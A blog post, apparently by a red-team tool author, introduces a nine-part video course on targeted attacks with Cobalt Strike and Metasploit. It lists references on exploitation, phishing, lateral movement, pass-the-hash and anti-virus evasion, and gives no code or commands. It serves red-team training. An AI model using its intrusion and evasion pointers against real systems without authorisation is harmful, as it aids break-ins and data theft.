A few days ago, I posted the YouTube playlist on Twitter and it’s made a few rounds. That’s great. This blog post properly introduces the course along with a few notes and references for each segment.
Tradecraft is a new nine-part course that provides the background and skills needed to execute a targeted attack as an external actor with Cobalt Strike. I published this course to help you get the most out of the tools I develop.
If you’d like to jump into the course, it’s on YouTube:
The YouTube ID of http://www.youtube.com/playlist?list=PL9HO6M_MU2nesxSmhJjEvwLhUoHPHmXvz is invalid.
Here are a few notes to explore each topic in the course with more depth.
The first part of tradecraft introduces the course, the Metasploit Framework, and Cobalt Strike. If you already know Armitage or the Metasploit Framework–you don’t need to watch this segment. The goal of this segment is to provide the base background and vocabulary for Metasploit Framework novices to follow this course.
To learn more about the Metasploit Framework:
Targeted Attacks and Advanced Persistent Threat:
- Read Intelligence-Driven Computer Network Defense from Lockheed Martin. The process in this course maps well to the “systematic process to target and engage an adversary” presented in this paper. If you need to exercise controls that detect, deny, disrupt, degrade, or deceive an adversary–I know a product that can help 🙂
- Watch Michael Daly’s 2009 USENIX talk, The Advanced Persistent Threat. This talk pre-dates the marketing bonanza over APT actors and their work. This is a common sense discussion of the topic without an agenda. Even though it’s from 2009, the material is spot on.
- Watch Kevin Mandia’s 2014 RSA talk, State of the Hack: One Year After the APT1 Report. This is a 20 minute summary of the APT1 report published by Mandiant in February 2013.
Advanced Persistent Threat Campaigns
These actors managed to compromise thousands of hosts and steal data from them for years, without detection. Cobalt Strike’s aim is to augment the Metasploit Framework to replicate these types of threats.
2. Basic Exploitation (aka Hacking circa 2003)
Basic Exploitation introduces the Metasploit Framework and how to use it through Cobalt Strike. I cover how to pick a remote exploit, brute force credentials, and pivot through SSH. I call this lecture “hacking circa 2003” because remote memory corruption exploits have little use in an environment with a handle on patch management. Again, if you have strong Metasploit-fu, you may skip this lecture.
A few notes:
- I dismiss remote memory corruption exploits as a dated vector; but don’t discount the remote attack surface. HD Moore and Val Smith‘s Tactical Exploitation is one of the best resources on how to extract information from exposed services. First published in 2007, it’s still relevant. Watch the video and read the paper.
- I used the Metasploitable 2 Virtual Machine for the Linux demonstrations in this segment.
3. Getting a Foothold
This segment introduces how to execute a targeted attack with Cobalt Strike. We cover client-side attacks, reconnaissance, and crafting an attack package.
To go deeper into this material:
4. Social Engineering
The fourth installment of tradecraft covers how to get an attack package to a user. The use of physical media as an attack vector is explored as well as watering hole attacks, one off phishing sites, and spear phishing.
- Watch Advanced Phishing Tactics by Martin Bos and Eric Milam. This talk puts together a lot of concepts needed for a successful phish. How to harvest addresses, develop a good pretext, and create a phishing site.
- Advanced Threat actors favor spear phishing as an access vector. I’d point you to one source, but since this concept has such market buzz, there are a lot of whitepapers on this topic. I suggest a google search and reading something from a source you consider credible.
5. Post Exploitation with Beacon
By this time, you know how to craft and deliver an attack package. Now, it’s time to learn how to setup Beacon and use it for asynchronous and interactive operations.
- Read Beacon – An Operator’s Guide for a summary of everything Beacon related.
- A lot of people claim “that’ll never work, we dont allow port 53 out” when I bring up Beacon’s DNS communication capability. They’re kind of… wrong. Read the linked post to find out why.
- Watch Dirty Red Team Tricks II to get an idea of how asynchronous C2 (e.g., beaconing) can complement interactive C2.
- After this course was cut, Beacon added the ability to communicate peer-to-peer over SMB pipes. I recommend studying up on this feature.
- Beacon’s command and control traffic is Malleable. This means you may redefine its indicators to look like other malware.
6. Post Exploitation with Meterpreter
This video digs into interactive post-exploitation with Meterpreter. You will learn how to use Meterpreter, pivot through the target’s browser, escalate privileges, pivot, and use external tools through a pivot.
7. Lateral Movement
This installment covers lateral movement. You’ll learn how to enumerate hosts and systems with built-in Windows commands, steal tokens, interrogate hosts to steal data, and use just Windows commands to compromise a fully-patched system by abusing trust relationships. My technical foundation is very Linux heavy, I wish this lecture existed when I was refreshing my skillset.
Token Stealing and Active Directory Abuse
Pass the Hash
8. Offense in Depth
This segment dissects the process to get a foothold into the defenses you’ll encounter. You’ll learn how to avoid or get past defenses that prevent message delivery, prevent code execution, and detect or stop command and control.
- If you like, you may use Cortana to force Armitage or Cobalt Strike to use an AV-safe executable of your choosing. You have the option to select an EXE with Cobalt Strike’s dialogs. This process allows you to automate the process of generating a new automatically for your payload parameters.
- Also, check out Veil, a framework for generating anti-virus safe executables.
- Here’s a blog post by funoverip.net on how to modify a client-side exploit to get past an anti-virus product
Offense in Depth
This last chapter covers operations. Learn how to collaborate during a red team engagement, manage multiple team servers from one client, and load scripts to help you out.
The online course does not have dedicated labs per se. I have two sets of labs I run through with this material.
When I’m hired to teach, I bring a Windows enterprise in a box. I have my students conduct several drills to get familiar with the tools. I then drop them into my enterprise environment and assign goals for them to go through.
I also have a DVD with labs that map to the old version of this course. This DVD has two Linux target virtual machines and an attack virtual machine. Nothing beats setting up a Windows environment to play with these concepts, but this DVD isn’t a bad starter. If you see me at a conference, ask for one.